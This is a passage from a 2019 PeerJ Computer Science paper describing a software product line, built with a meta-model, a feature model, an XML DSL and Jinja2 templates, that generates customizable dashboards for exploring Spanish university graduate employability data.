analysis, on the other hand, uses data to detect new avenues of research. For instance, when a user does not have a clear question about the data, it will use exploratory research to find patterns or relations among variables. This same user could employ the acquired knowledge to explain the insights reached through previous explorations using an explanatory visualization. Exploratory visualizations rely intensely on interaction to provide their functionality and to allow users to drill-down datasets, being able to discover new aspects of the domain by directly communicating with the graphical interface. However, an interaction can take many forms, and there is not a single solution to obtain usable and intuitive interfaces valid for every user. For instance, some users could find useful a visible control panel to manage data if they are going to apply filters, aggregations and so on intensively. On the other hand, other users can demand in-place interaction if they give more importance to having more space for the visualizations (instead of having a permanent control panel consuming screen space). Another example is that users that speak a left-to-right (LTR) or a right-to-left (RTL) language would demand different layouts for the same task, according to their sociodemographic or cultural context (Almakky, Sahandi & Taylor, 2015; Marcus & Gould, Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 6/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 2000). Also, visualization novices could require task-oriented dashboards to support their visual analysis, since their past experience with this kind of tools is a relevant factor when interacting with a system (Elias & Bezerianos, 2011). Once patterns, relations between variables and interesting dimensions have been identified through the exploration of data, even the exploratory nature of a dashboard can change for a more explanatory purpose to present the results understandably and strikingly. For all these reasons dashboards, their components, their interaction, and even their primary purpose need advanced configuration and customization to fit into different contexts and requirements. Moreover, as it has been aforementioned, SPLs provide a potential solution to efficiently address this customization since visual components and interaction methods could be treated as features of the product line, decreasing the resources needed during the development and maintenance of dashboards. MATERIALS & METHODS This section presents the materials and techniques used during the development of this first approach to a framework for generating dashboards to explore employment- and employability-related variables. Meta-model The problem to address requires abstract modelling to capture basic features within the dashboards’ domain. To do so, a meta-model is proposed. Meta-models are a crucial artefact in model-driven engineering and model-driven architectures (Kleppe, Warmer & Bast, 2003), as they allow to define a high-level view of the domain without depending on specific technologies. Therefore, meta-models should remain as simple as possible to eventually, through a series of mappings and transformations, obtain concrete models (Álvarez, Evans & Sammut, 2001). For this generic dashboards’ domain, the meta-model found in Fig. 1 is proposed. First of all, a specific user could handle a dashboard. This dashboard could be composed of one or more pages, being these last composed, in turn, by one or more containers. A container could be seen as a row or a column, and it can recursively contain more containers. The container recursion ends with a component, which is any graphic element that can be used in a dashboard. The recursion mentioned above allows the arrangement of any layout by the recurrent combination of rows and columns. This meta-model eases the vision of the dashboards’ domain, and it also allows to identify the common base of any dashboard. Feature model The meta-model gives a high-level vision of the dashboards’ domain. However, it does not capture concrete features. That is why software product lines rely on feature models (Kang et al., 1990) to identify common and variable assets. Feature models not only serve as a documentation element but also as an important artifact within the development process. The implementation of the core assets and the materialization of variability points on the code must be guided by the previously defined feature model. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 7/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 Figure 1 Dashboard meta-model. The dashboard meta-model allows a high level view of the target do- main. Full-size DOI: 10.7717/peerjcs.203/fig-1 In this domain, the feature model will capture the dashboards’ visualization components, as well as individual features and restrictions of each visualization. The hierarchical structure of the feature model allows to define high-level characteristics and refine them through the tree structure until reaching the lower-level features (i.e., fine-grained features). This structure makes the scalability of features easier, since adding new features involves the addition of new nodes to the feature tree uniquely. For the Observatory’s dashboards, three main configurable visual components (features) have been defined: a scatter diagram, a chord diagram and a heat map. These visualizations address the requirements of the Observatory’s data but can be reused for other data domains. Also, it is possible to specify a global filter that affects the data of all components previously defined. These high-level features of the dashboards’ product line are presented in Fig. 2. A detailed view of the scatter diagram feature can be seen in Fig. 3. It has a set of subsequent features, either mandatory, optional or alternative. One mandatory feature is the base logic of the scatter diagram (i.e., the component layout construction and its primary logic). Another mandatory feature is the initial data that the diagram will be showing on different dimensions since it must be specified. Among the optional features, it is possible to determine whether a tooltip will show up when hovering on data points if a set of controls will support the data exploration, or the capacity to zoom or export the diagram. Also, a title for the visualization can be included. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 8/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-1 http://dx.doi.org/10.7717/peerj-cs.203 Figure 2 High-level view of the feature diagram. This feature diagram shows high-level components that could compose the dashboard. Full-size DOI: 10.7717/peerjcs.203/fig-2 Figure 3 High-level view of the scatter diagram component’s features. This snippet of the feature model shows the possible features regarding the scatter diagram component. Full-size DOI: 10.7717/peerjcs.203/fig-3 For the sake of simplicity, some of the lower-level features have been omitted in Fig. 3. For instance, the bar and panel control features have subsequent features. The detailed features for a panel type control are shown in Fig. 4 to provide an example. A control panel will rely on its underlying logic, and it can count on different optional features, like data selectors to dynamically change the visualization’s presented data; in case of the X and Y axes, these selectors could be located within the control panel space or in-place controls (i.e., situated near the scatter diagram axes). Other possible features involve having an overview that shows a detailed view of a data point when hovering, data filters, among others. The feature diagram provides a high-level and organized overview of the SPL, improving the organization of the source code and development tasks. Domain-specific language There is, however, a necessity of connecting the previous models to the dashboards’ source code to be generated (Voelter & Visser, 2011). A Domain-Specific Language (DSL) has been designed to accomplish this connection. This DSL is based on the identified domain’s features, by structuring them with XML technology (Bray et al., 1997) and by validating the model restrictions with an XML schema (Fallside, 2000). XML technology provides Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 9/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-2 https://doi.org/10.7717/peerjcs.203/fig-3 http://dx.doi.org/10.7717/peerj-cs.203 Figure 4 High-level view of a component’s panel subsequent features. This part of the feature diagram shows lower-level features regarding the components’ control panel. Full-size DOI: 10.7717/peerjcs.203/fig-4 Figure 5 Snippet of the DSL schema. It is possible to specify the dashboard layout and its elements (i.e., data filters, components, etc.). Full-size DOI: 10.7717/peerjcs.203/fig-5 a readable and easy-to-parse manner for injecting functionalities or requirements in a system, fostering flexibility since these rules are not directly defined (or hard-coded) in the source code. The following examples describe the DSL developed for this work. Following the meta-model, every dashboard will be composed by one or more pages, each page with its configuration (i.e., layout and components, as seen in Fig. 5), and each page component with its setting (given the feature model, as seen in Fig. 6). Data resources of each visual component are represented by the XSD generic type ‘‘anyType’’, to decouple the data structure and format from the presentation, and also to open up the possibility of injecting dynamic data sources without affecting the DSL syntax. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 10/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-4 https://doi.org/10.7717/peerjcs.203/fig-5 http://dx.doi.org/10.7717/peerj-cs.203 Figure 6 DSL schema regarding the specification of the dashboard components. It is possible to see the link between the feature model elements and the XML schema elements (e.g., the components that could compose the dashboard). Full-size DOI: 10.7717/peerjcs.203/fig-6 Figure 7 DSL schema regarding the specification of the scatter diagram component. This part of the DSL represents the available features for the scatter diagram component. Full-size DOI: 10.7717/peerjcs.203/fig-7 In Figs. 6 and 7 the resemblance of the XML schema structure with the feature model can be appreciated. The hierarchical nature of XML matches with the hierarchical structure of feature diagrams. This resemblance allows better traceability of the features involved in the product line, because the syntax of the DSL is obtained from the feature model, thus providing a computer-understandable specification of the SPL, necessary to process the requirements and to automate the dashboard generation. In this current approach, the dashboard’s feature model serves as documentation, but, as it will be discussed, it would be extremely valuable to create a programmatic link between this model and the DSL specification, in order to propagate and reflecting any feature model change automatically in the DSL, improving maintainability. Finally, Fig. 8 shows how the layout of the dashboard is specified in terms of rows, columns and components (following, again, the meta-model previously presented). The Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 11/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-6 https://doi.org/10.7717/peerjcs.203/fig-7 http://dx.doi.org/10.7717/peerj-cs.203 Figure 8 XML type for specifying the dashboard’s layout. The dashboard layout (previously modeled through the dashboard meta-model) is specified by creating a custom type. Full-size DOI: 10.7717/peerjcs.203/fig-8 DSL combines both the meta-model and feature model designs to obtain a specific syntax to configure all the aspects regarding the generation of final products. The whole schema for the DSL can be consulted at the following GitHub repository https://github.com/AndVazquez/dashboard-spl-assets (Vázquez-Ingelmo, 2018). Code generator To put together all the developed assets and concepts, a code generator has been developed to manage the generation of functional dashboards. The generator interprets the DSL (i.e., XML configuration files) and selects the appropriate template (i.e., core assets of the SPL) to configure them by injecting the chosen features, obtaining the dashboards’ final source code. The code templates and XML configuration files are managed by the developers following the elicited user requirements. The inputs and outputs of the code generator can be seen in Fig. 9. Code templates The next challenge regarding the implementation of this SPL involves the choice of the techniques for materializing the product line’s variability points. In this case, personalization is focused on the visual elements of the system’s presentation layer, which require fine-grained variability (Kästner & Apel, 2008). Coarse-grained variability involves the addition and removal of full components, which is also useful for this approach (users may prefer a scatter diagram over a chord diagram to achieve their goals, removing the last from the dashboard). However, visual components themselves (referring to the elements that compose them) also require high variability to fit into different requirements, Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 12/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-8 https://github.com/AndVazquez/dashboard-spl-assets http://dx.doi.org/10.7717/peerj-cs.203 Figure 9 Code generator inputs and outputs. The code generator is fed with the code templates and the XML configuration files to provide the final source code of the dashboard. Full-size DOI: 10.7717/peerjcs.203/fig-9 so fine-grained variability needs to be accomplished. There exist different approaches to implement fine-grained software composition, as in the case of FeatureHouse (Apel, Kastner & Lengauer, 2009), which uses superimposition and feature structure trees (FSTs), however, not every method supports the currently required granularity, which involves even statement-level variability. Fine granularity often prohibits superimposition approaches (Apel, Kästner & Lengauer, 2013). The mechanism chosen to reach the desired feature granularity is based on template engines. Template engines allow to tag sections and parameterize units of source code to inject concrete values later and obtain complete source files. This mechanism accomplishes the necessity of materializing the variable features of a tangible product of the line. Jinja2 (Ronacher, 2008) was selected as the engine for developing the core assets of this SPL. This template engine allows the definition of custom tags, filters and even macros, being the last one of the essential features to organize the core assets. As described in (Kästner & Apel, 2008), fine-grained approaches can make the source code tedious to read and maintain. By declaring every variant feature on different macros to compose them subsequently, it is possible to achieve high cohesion and loose coupling on the SPL feature implementation process, improving reusability and source code organization by grouping the different functionalities by its parent feature. There was no need to implement extensions of the Jinja2 implementation and mechanisms, as its current syntax was sufficient for the annotative approach followed. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 13/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-9 http://dx.doi.org/10.7717/peerj-cs.203 Figure 10 Workflow of the code generation process. A simplified view of the code generator behavior. Full-size DOI: 10.7717/peerjcs.203/fig-10 A diagram of the detailed workflow for generating the source code can be seen in Fig. 10. The code templates for this case study can be also consulted at https://github.com/AndVazquez/dashboard-spl-assets (Vázquez-Ingelmo, 2018). RESULTS Generated dashboards As it has been already introduced, the Observatory collects important datasets to research the employability and employment of graduates from Spanish universities. Relying on a customizable exploratory tool would increase the chances of discovering interesting patterns or relations within these complex fields. The dashboards of this case study have a series of particular requirements due to the data domain and the specific characteristics of the Observatory studies. For instance, the developed data visualizations exploit different Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 14/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-10 https://github.com/AndVazquez/dashboard-spl-assets http://dx.doi.org/10.7717/peerj-cs.203 Figure 11 Results derived from the first configuration. Through this configuration is possible to apply different filters simultaneously to each scatter diagrams to observe how patterns evolve. Full-size DOI: 10.7717/peerjcs.203/fig-11 dimensions of the Observatory’s collected variables. Also, the generated Observatory’s dashboards needed to be connected to the organization’s GraphQL API (Facebook, 2016) that allow users to retrieve data statistics on demand (Vázquez-Ingelmo, Cruz-Benito & García-Peñalvo, 2017; Vázquez-Ingelmo, García-Peñalvo & Therón, 2018a; Vázquez- Ingelmo, García-Peñalvo & Therón, 2018b; Vázquez-Ingelmo, García-Peñalvo & Therón, 2018c), decoupling the data resources from the visual components’ logic. In this section, the results derived from the application of the presented dashboard product line within the university employment and employability domain are described. By tuning SPL through particular configurations, it is possible to obtain tailored solutions for different requirements and tasks. Configuration #1. Comparison of different values is one of the most relevant tasks regarding the exploration of university employability and employment data. These comparisons could enlighten which factors affect employability and employment to a greater or lesser extent, leading to the possibility of conducting deeper analyses. For example, by configuring a dashboard with two scatter diagrams side by side, it is possible to apply different filters to each one and observe how data patterns evolve (Fig. 11). Also, adding the global reference feature to both diagrams helps to make comparisons by adding a reference line marking the unfiltered and disaggregated values. It is possible to appreciate, for example, that men graduates are more optimistic when commenting opinions about their future wages and the possibility of developing a working career in Spain (Michavila et al., 2018b). However, these diagrams also allow seeing at a glance that Arts and Humanities and Sciences graduates are more pessimistic about their future than their counterparts in other branches of knowledge, which are more clustered. For instance, only 40% of Sciences women graduates think that they could have a working career in Spain within five years. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 15/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-11 http://dx.doi.org/10.7717/peerj-cs.203 Figure 12 Results derived from the second configuration. The scatter diagram shows the link between different students’ opinions classified by gender. Full-size DOI: 10.7717/peerjcs.203/fig-12 This configuration enables the user to explore data through the combination of different aggregations, variables and filters. Configuration #2. The previous configuration, however, could be complex for some users by having to control two diagrams at the same time to align different factors. A single scatter diagram could be added to the dashboard to drill-down data. It is possible to add another dimension to the scatter diagram component by mapping numerical variables through the radius of the visualization’s data points. For instance, following the same example of the first configuration, the differences between male and females can be observed by a gender aggregation of the data. In this case, the population of each group is mapped through the radius of the points (Fig. 12). However, to see how the branch of knowledge affects the value of these variables, similarly to the previous configuration, it is necessary to continuously filter data by every single branch (Fig. 13). This configuration is then not recommendable when continuous, and more complex comparisons (such as the one made in the previous scenario) are required. If, on the other hand, data exploration is not continuously required by a user, the controls could be allocated within a top bar (Fig. 14) that can be hidden to give more space to the visualizations. Configuration #3. On the other hand, different pages focused on different data variables or data dimensions could be configured. This functionality allows freedom when arranging the content of the dashboards’ pages to make it understandable for every particular user. In the Observatory’s case, a user might prefer having the dashboard screens organized by the study edition, being able to navigate through them thanks to a navigation bar (Fig. 15). Or if preferred, it could be specified that each page will exploit a different set of data variables; for example, having a single tab to explore the students’ competences (Fig. 16). Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 16/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-12 http://dx.doi.org/10.7717/peerj-cs.203 Figure 13 Results derived from the second configuration. The scatter diagram shows the link between different students’ opinions classified by gender and filtered by the branch of knowledge, showing only the results related to Science students. Full-size DOI: 10.7717/peerjcs.203/fig-13 Figure 14 Modification of the second configuration to change the controls location. The controls for the scatter diagram are arranged in a bar on top of the visualization. Full-size DOI: 10.7717/peerjcs.203/fig-14 Through this view it is possible to see a misalignment between the perceived level that the graduates have about their skills and the perceived level of contribution of the studies regarding the acquisition of that skills, and also between that possessed level and the perceived required level in their job positions (Michavila et al., 2018b). Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 17/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-13 https://doi.org/10.7717/peerjcs.203/fig-14 http://dx.doi.org/10.7717/peerj-cs.203 Figure 15 Dashboard involving different information visualizations. By specifying the layout of the dashboard it is possible to achieve dashboards with different components, each one with its own features. Full-size DOI: 10.7717/peerjcs.203/fig-15 The previous dashboards are a quite tiny set of the available combinations that can be achieved through the SPL configuration, but they should serve as an example to show the possibilities of having a framework for generating personalized dashboards. Product metrics The metrics for the SPL are the following regarding its feature model: • Feature model height: 9 • Features: 146 • Optional features: 106 The number of valid configurations has been omitted, given the recursion of the dashboards’ composition (as highlighted in the dashboard meta-model), so infinite valid configurations can be generated. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 18/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-15 http://dx.doi.org/10.7717/peerj-cs.203 Figure 16 Possible layout configuration for comparing students’ skills through different study edi- tions. This configuration can be useful to identify lack of skills at-a-glance or their evolution through time. Full-size DOI: 10.7717/peerjcs.203/fig-16 Regarding the core-assets (i.e., the templates’ source code), the following metrics have been calculated (El-Sharkawy, Yamagishi-Eichler & Schmid, 2018): • Lines of feature code (LoF): 2,638 lines of feature code. This metric is the addition of every line of code affected by any Jinja2 directive (i.e., every annotated line of code). It is a size metric that gives a high-level view about the source code associated to the SPL features. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 19/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-16 http://dx.doi.org/10.7717/peerj-cs.203 Figure 17 Simplified Gantt diagram of the SPL development. The Gantt diagram shows each task re- garding the SPL development including its contextualization and design. Full-size DOI: 10.7717/peerjcs.203/fig-17 • Fraction of annotated lines of code (PLoF): 48.39%. This is a variability density metric showing that the SPL’s products have a 51.61% of common code (2,814 lines of code are not annotated). • Scattering of variation points: this metric counts the number of times that a feature appears in the code (i.e., appears in a Jinja2 condition directive). High scattering values decreases the readability of the code. By refactoring the code into macros that contain all code associated to a specific feature, the scattering is reduced. Given the complex domain in which the product line has been applied (i.e., the dashboards’ domain), the scattering of the variation points was one of the main concerns, as high scattering would make the code even more complex. That was the reason to arrange the feature code into macros as a solution to address the scattering of variability points. Development time improvement The development of the presented SPL, including its conceptualization and design, took 82 days, as illustrated through a simplified Gantt diagram in Fig. 17. The core assets development task includes all the artifacts regarding the SPL (i.e., the DSL, the templates, etc.). Before implementing this approach, a dashboard template with the same components and KPIs was the solution to offer all the results held in the Observatory’s study, so universities could compare their individual results with the global, aggregated results. The development of the mentioned dashboard template took 15 days. However, this static approach limited universities to freely explore their data, as mentioned in other sections. Five of the 50 universities were interviewed to capture their dashboard requirements and to estimate the elicitation process time consumption. However, this estimation should be considered as speculative given the variability of the complexity of the elicitation process, and especially, given the number of different universities (i.e., users) involved. Nevertheless, the requirement elicitation took one day for the interviewed universities. Given the project’s potential continuity, the dashboard implementation process would mainly consume time regarding requirements elicitation by using the presented SPL approach, decreasing the time spent on development processes. Without this approach, the information dashboards implemented for future Observatory’s employability study editions would remain static and generalized for each involved user. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 20/29 https://peerj.com https://doi.org/10.7717/peerjcs.203/fig-17 http://dx.doi.org/10.7717/peerj-cs.203 Building a personalized dashboard consume resources in terms of requirement elicitation and design, but also in terms of implementation or development. If the development phases are automated, then the main benefit is not only decreasing the development time of individual dashboards, but also, if necessary, devoting more time to the requirements identification and design phases, which, in the end, are the backbone of well-constructed dashboards. That is why, although significant time was consumed for the implementation of the dashboard SPL (82 days), it can be seen as an investment for the future, specifically in environments where significant quantities of user profiles are involved. DISCUSSION The application of domain engineering and the SPL paradigm to identify and factorize information dashboard functionalities has shown its usefulness to generate different dashboards with a set of common assets through the study of the dashboards’ domain. The obtained results are fairly valuable, and open new paths for applying this approach to other data domains with new requirements. Dashboards are complex software solutions that could be highly beneficial when adequately designed and tailored for specific users. These products can support decision- making processes, assisting visual analysis by presenting information in an understandable manner. However, the variety of profiles involved in these processes and their different definitions of ‘‘understandable’’ makes the implementation of dashboards a time- and resource-consuming task, since a dashboard configuration that is highly useful for one user could be pointless for the rest of them. What is more, dashboards can be composed of several elements, from simple visualizations to different linked views, cross-filtering capabilities, interaction methods, handlers, etc., thus making the dashboards’ domain a complex domain not only because of the different profiles of potential users, but because of the great quantity of feasible combinations of these ‘‘dashboard elements’’ to build a proper solution. In addition, these features can be very fine-grained; in user-centered systems, a slight modification on visualization types, interaction patterns, layouts, color palettes, etc. could be crucial regarding the final perceived usability of the product. Relying on a framework to easily generate information dashboards would allow stakeholders to focus on the information requirements and their refinement to provide better results when seeking valuable insights on large datasets. Also, it opens up the possibility to automatically adapt the dashboards’ configurations to match dynamic requirements based on the device used (Cruz-Benito et al., 2018b) or other factors. The factorization of the dashboards’ components into individual features allow fine- grained reusability and a set of customization options. This fine-grained customization enables the possibility of having highly functional and exploratory-centered visualizations as well as more basic visual components more centered on the explanation of insights through the addition or removal of low-level features. The achieved granularity provides a foundation to develop not only whole visualization components, but also new interaction methods and design features that can be easily interchangeable to fulfill particular sets of user requirements. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 21/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 An annotative method of implementation was undertaken using macros to encapsulate individual functionalities. This method takes all the benefits from the annotative approach (fine-grained customization) and avoids its code verbosity and scalability issues by dividing the core assets into base templates and macros (Kästner & Apel, 2008). Although there were other possibilities to implement the variability points, such as superimposition approach (which did not fulfilled the requirements for performing this approach, as discussed in the Materials & Methods section) like the FeatureHouse framework (Apel, Kastner & Lengauer, 2009; Apel & Lengauer, 2008) or the XVCL (Jarzabek et al., 2003) mechanism (which fits the feature granularity requirements of this domain), the final decision of using a templating engine allowed the direct connection of the designed DSL with the final source code, providing a higher level language to specify the dashboards’ features, as well as the possibility of organizing the variability points into macros to increase readability, traceability and maintainability by having all the code associated to a feature in the same source file. The chosen technology to implement the DSL was XML. The decision of implementing directly the DSL in XML technology was made because of the hierarchical nature of XML, and its resemblance to the hierarchical structure of the feature diagram, thus being the designed DSL a computer-understandable ‘‘translation’’ of the feature model for the dashboard generator to process. However, this language could be not as human-readable as other DSL solutions, generating issues if a non-expert user wants to specify its dashboards requirements by himself. Creating a friendly user interface to allow the dashboards’ feature selection without involving direct manipulation of the XML files can be a valuable solution to address these issues and ease the product configuration process in the future. Customization at functionality level has illustrated to be straightforward, as it is possible to easily vary the behavior of the visual components through the DSL. Visual design attributes customization, however, needs to be faced more deeply, as only the layout composition can be specified in detail at the moment. The visual customization challenge cannot be overlooked since dashboards not only have to provide valuable functionality; they should offer that functionality through a pleasant and usable interface (Few, 2006; Sarikaya et al., 2018). On the other hand, this work has addressed customization focused on the presentation layer of dashboards, but with the SPL paradigm, architectural design can also be customized in order to provide different functional features regarding data processing, interoperability, storage, performance, security, etc., achieving a complete customizable dashboard solution, not only focusing on the visual presentation. Regarding data acquisition, the developed tool was integrated with the Observatory’s GraphQL API to provide dynamic data exploration. The connection to this particular type of data source involved the implementation of specific connectors to decouple the visualizations from the particular source. The variability of data sources is another identified challenge to be addressed through this approach, to support different data formats or data structures. Although counting on a GraphQL API facilitated the data retrieval by the unification of data requests, it is essential to enable the specification of other data retrieval methods. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 22/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 Product metrics showed that significant feature code was needed to address high customizability of the dashboards (48.39% of the source code was annotated). Also, arranging the feature code into macros helped to increase features’ traceability as well as to decrease the scattering of the variability points throughout the code, making the code more readable and maintainable. The approach can decrease the development time of individualized dashboards for each involved university. As presented in the results section, the SPL not only offered space for development time improvements, but also enabled the capacity of offering customized solutions, which was previously regarded as unviable given the time constraints of the Observatory’s project. Embracing the SPL paradigm can be seen as an investment for the future for projects with a common domain and with continuity over time. Finally, it is clear that interesting patterns can be discovered thanks to the application of this dashboard SPL on the employability and employment fields. The Observatory’s data provide a great context to perform more advanced analyses to enlighten this complex domain. Having powerful visualization tools allow reaching insights about patterns or factors to guide the execution of more complex analyses and make decisions about the actions to take or the future research directions, like developing machine learning (ML) models (García-Peñalvo et al., 2018). Regarding this last field, having visualization tools to explore the input data before training any ML model could help to build better and more accurate models through an appropriate feature selection phase guided by the previously reached insights (Hall, 1999). The main weaknesses and limitations of this solution come from the preliminary nature of the framework; it is crucial to further validate the usability of the automatically generated products to show their usefulness to the main beneficiaries of the dashboards: the users, as well as assess its implementation in other domains. The approach needs to be further generalized to provide a more versatile method and to match also development requirements (available technology or preferred programming languages), although results seem promising. Automating the generation of dashboards given their goal, their context, their end users, etc. could be extremely beneficial due to the vast potential of impact that these tools have (Sarikaya et al., 2018). CONCLUSIONS A domain engineering approach has been applied to the dashboards’ domain to obtain a SPL of this type of software solution. By the identification of commonalities and variability points, a dashboard meta-model has been developed as well as a feature model to capture the different customization dimensions of the SPL. The SPL has been developed through an annotative approach using code templates and macros (forming the core assets of the family of products). A DSL has been designed to facilitate and automate the application engineering process. The configuration files based on the DSL feed a code generator in charge of adding or removing the product features. The presented approach was applied within the Spanish Observatory for Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 23/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 University Employability and Employment system, to provide a variety of dashboard configurations that enable the exploitation and exploration of different dimensions regarding employability and employment data. Future research lines will involve refinements of the meta-model and the DSL, usability testing of the obtained products and A/B testing (Cruz-Benito et al., 2018a; Cruz- Benito et al., 2018b; Kakas, 2017; Siroker & Koomen, 2013) on different configurations. Architectural customization could be supported to add more coarse-grained features like a visualization recommendation engine (Gotz & Wen, 2009; Vartak et al., 2017; Voigt et al., 2012), interface language translation or data preprocessing techniques before its presentation. Finally, the customization levels of the dashboards’ visual design and data sources need to be further addressed. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported in part by the Spanish Government Ministry of Economy and Competitiveness throughout the DEFINES project (Ref. TIN2016-80172-R), in part by the PROVIDEDH project, funded within the CHIST-ERA Programme under the national grant agreement: PCIN-2017-064 (MINECO, Spain) and in part by La Caixa Foundation. The work of A Vázquez-Ingelmo was supported by the Spanish Ministry of Education and Vocational Training under an FPU fellowship (FPU17/03276). There was no additional external funding received for this study. The funders helped with the contextualization of the research. Grant Disclosures The following grant information was disclosed by the authors: Spanish Government Ministry of Economy and Competitiveness: Ref. TIN2016-80172-R. CHIST-ERA Programme: PCIN-2017-064. La Caixa Foundation. Spanish Ministry of Education and Vocational Training: FPU17/03276. Competing Interests The authors declare there are no competing interests. Author Contributions • Andrea Vázquez-Ingelmo conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • Francisco J. García-Peñalvo and Roberto Therón conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/- materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 24/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 Data Availability The following information was supplied regarding data availability: Data and assets are available at https://github.com/AndVazquez/dashboard-spl-assets. (DOI: 10.5281/zenodo.1478134). REFERENCES Albright SC, Winston W, Zappe C. 2010. Data analysis and decision making. Mason: Cengage Learning. Almakky H, Sahandi R, Taylor J. 2015. The effect of culture on user interface design of social media—a case study on preferences of saudi arabians on the arabic user interface of facebook. World Academy of Science, Engineering Technology International Journal of Social, Behavioral, Educational, Economic, Business Industrial Engineering 9:107–111 DOI 10.5281/zenodo.1337791. Álvarez JM, Evans A, Sammut P. 2001. Mapping between levels in the metamodel architecture. In: International conference on the unified modeling language. Berlin, Heidelberg: Springer, 34–46 DOI 10.1007/3-540-45441-1_4. Apel S, Kastner C, Lengauer C. 2009. FEATUREHOUSE: language-independent, automated software composition. In: Proceedings of the 31st international conference on software engineering. Washington, D.C.: IEEE Computer Society, 221–231. Apel S, Kästner C, Lengauer C. 2013. Language-independent and automated software composition: the FeatureHouse experience. IEEE Transactions on Software Engineer- ing 39:63–79 DOI 10.1109/TSE.2011.120. Apel S, Lengauer C. 2008. Superimposition: a language-independent approach to software composition. In: International conference on software composition. Berlin, Heidelberg: Springer, 20–35 DOI 10.1007/978-3-540-78789-1_2. Bray T, Paoli J, Sperberg-McQueen CM, Maler E, Yergeau F. 1997. Extensible markup language (XML). World Wide Web Journal 2:27–66. Card M. 1999. Readings in information visualization: using vision to think. San Francisco: Morgan Kaufmann. Chadha D, Toner J. 2017. Focusing in on employability: using content analysis to explore the employability discourse in UK and USA universities. International Journal of Educational Technology in Higher Education 14:33 DOI 10.1186/s41239-017-0071-0. Clark S. 2018. Render your first network configuration template using Python and Jinja2. Available at https://blogs.cisco.com/developer/network-configuration-template. Clements P, Northrop L. 2002. Software product lines. Boston: Addison-Wesley. Cruz-Benito J, Sánchez-Prieto JC, Vázquez-Ingelmo A, Therón R, García-Peñalvo FJ, Martín-González M. 2018a. How different versions of layout and complexity of web forms affect users after they start it? A pilot experience. In: Rocha Á, Adeli H, Reis LP, Costanzo S, eds. Trends and advances in information systems and technologies. Cham: Springer, 971–979 DOI 10.1007/978-3-319-77712-2_92. Cruz-Benito J, Vázquez-Ingelmo A, Sánchez-Prieto JC, Therón R, García-Peñalvo FJ, Martín-González M. 2018b. Enabling adaptability in web forms based on user Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 25/29 https://peerj.com https://github.com/AndVazquez/dashboard-spl-assets http://dx.doi.org/10.5281/zenodo.1478134 http://dx.doi.org/10.5281/zenodo.1337791 http://dx.doi.org/10.1007/3-540-45441-1_4 http://dx.doi.org/10.1109/TSE.2011.120 http://dx.doi.org/10.1007/978-3-540-78789-1_2 http://dx.doi.org/10.1186/s41239-017-0071-0 https://blogs.cisco.com/developer/network-configuration-template http://dx.doi.org/10.1007/978-3-319-77712-2_92 http://dx.doi.org/10.7717/peerj-cs.203 characteristics detection through A/B testing and machine learning. IEEE Access 6:2251–2265 DOI 10.1109/ACCESS.2017.2782678. El-Sharkawy S, Yamagishi-Eichler N, Schmid K. 2018. Metrics for analyzing variability and its implementation in software product lines: a systematic literature review. Information Software Technology 106:1–30 DOI 10.18420/se2019-53. Elias M, Bezerianos A. 2011. Exploration views: understanding dashboard creation and customization for visualization novices. In: IFIP conference on human-computer inter- action. Berlin, Heidelberg: Springer, 274–291 DOI 10.1007/978-3-642-23768-3_23. Ezzat Labib Awad A. 2017. Enforcing customization in e-Learning systems: an ontology and product line-based approach. PhD thesis, Universitat Politécnica de 